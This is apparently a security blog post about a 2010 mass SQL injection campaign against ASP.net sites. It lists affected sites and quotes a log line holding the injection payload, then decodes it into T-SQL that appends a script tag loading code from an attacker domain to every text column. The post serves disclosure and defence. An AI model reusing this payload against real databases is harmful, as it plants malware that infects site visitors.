14 SHARES Facebook Twitter

An incredibly large number of sites have been hacked in the last day with a malware script pointing to http://ww.robint.us/u.js. Not only small sites, but some big ones got hit as well:

http://www.intljobs.org (still hacked)

http://www.servicewomen.org (still hacked)

http://online.wsj.com (partially fixed)

http://www.asbmb.org

http://www.lotl.com

http://acsi.org/

http://www.cinemathequeontario.ca

http://www.plazakvinna.com

http://www.delawareriverkeeper.org/

http://www.traveldaily.co.uk

http://www.thepaddockarea.com

http://www.ex-designz.net

http://www.historyasia.com/

http://www.montrealmetropolis.ca

http://www.charlottelive.org

http://www.cebes.org.br

How many sites got infected? According to Google over *114.000 different pages have been infected. Wow!



Update 09/06/10 – not 1,000,000+ like we originally reported, sorry – bad google-fu.

What do all these sites have in common? They are all hosted on IIS servers and using ASP.net. This is the output of our scanner against www.intljobs.org:

This is the same attack reported by Sophos yesterday that hacked the Jerusalem Post.

Update 09/06/10 – Dale Neufeld from NSM Junkie was able to collect logs and packet dump from the attack. This is what he found:

Original web request (payload truncated for readability):

2010-06-07 13:31:15 W3SVC1 webserver 192.168.1.10 GET /page.aspx utm_source=campaign&utm_medium=banner&utm_campaign=campaignid&utm_content=100×200′;dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x6445634C6152652040742076……..

6F523B2D2D%20eXEc(@s)– 80 – 121.xx.xxx.xx HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322) – – www.website.com 200 0 0 32068 1685 0

When we pull this apart we have:

dEcLaRe @s vArChAr(8000)

set @s=0x6445634C6152652040742076……..6F523B2D2D

eXEc(@s)–

So they’re essentially setting up the varaible ‘@s’ and executing it. Next we decode the variable ‘@s’:

0xdEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b wHeRe a.iD=b.iD AnD a.xTyPe=’u’ AnD (b.xTyPe=99 oR b.xTyPe=35 oR b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec(‘UpDaTe [‘+@t+’] sEt [‘+@c+’]=rtrim(convert(varchar(8000),[‘+@c+’]))+cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696

E742E75732F752E6A733E3C2F7363726970743E aS vArChAr(51)) where [‘+@c+’] not like ”%robint%”’) fEtCh next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe tAbLe_cursoR;–

Now they’re iterating through the sysobjects table to find out your actual table names and then iterating through those and appending the final encoded string.

cAsT(0x3C736372697074207372633D687474703A2F2F77772E726F62696E742E75732

F752E6A733E3C2F7363726970743E

Decoded:

0x<script src=hxxp://ww.robint.us/u.js></script>

So it looks like a SQL injection attack against a third party ad management script. If you have more information, please share with us.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.